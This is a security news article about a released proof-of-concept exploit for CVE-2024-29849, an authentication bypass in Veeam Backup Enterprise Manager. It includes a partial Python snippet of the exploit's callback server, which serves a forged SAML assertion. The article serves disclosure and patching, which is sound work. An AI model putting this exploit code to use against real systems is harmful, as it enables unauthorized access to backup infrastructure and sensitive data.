A proof-of-concept exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager tracked as CVE-2024-29849.
The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software. This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443.
The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service. The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.
The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.
By exploiting this vulnerability an attacker can gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.
Veeam has recommended immediate updates to their software’s latest version, including patches, to address this vulnerability.
Below is a snippet of the PoC code:
from http.server import HTTPServer, SimpleHTTPRequestHandler import ssl import warnings import base64 import requests from urllib.parse import urlparse from threading import Thread import os warnings.filterwarnings("ignore", category=DeprecationWarning) requests.packages.urllib3.disable_warnings() class CustomHandler(SimpleHTTPRequestHandler): def do_POST(self): xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"> <saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer> <saml2:Status> <saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/> </saml2:Status> </saml2:Assertion>''' self.send_response(200) self.send_header("Content-type", "text/xml") self.end_headers() self.wfile.write(xml_response.encode("utf-8")) print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType") def start_callback_server(ip, port): httpd = HTTPServer((ip, port), CustomHandler) ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) ssl_context.load_cert_chain("server.pem", keyfile="key.pem") httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True) print(f"(*) Callback server listening on https://{ip}:{port}") httpd.serve_forever() # Additional code for exploit execution...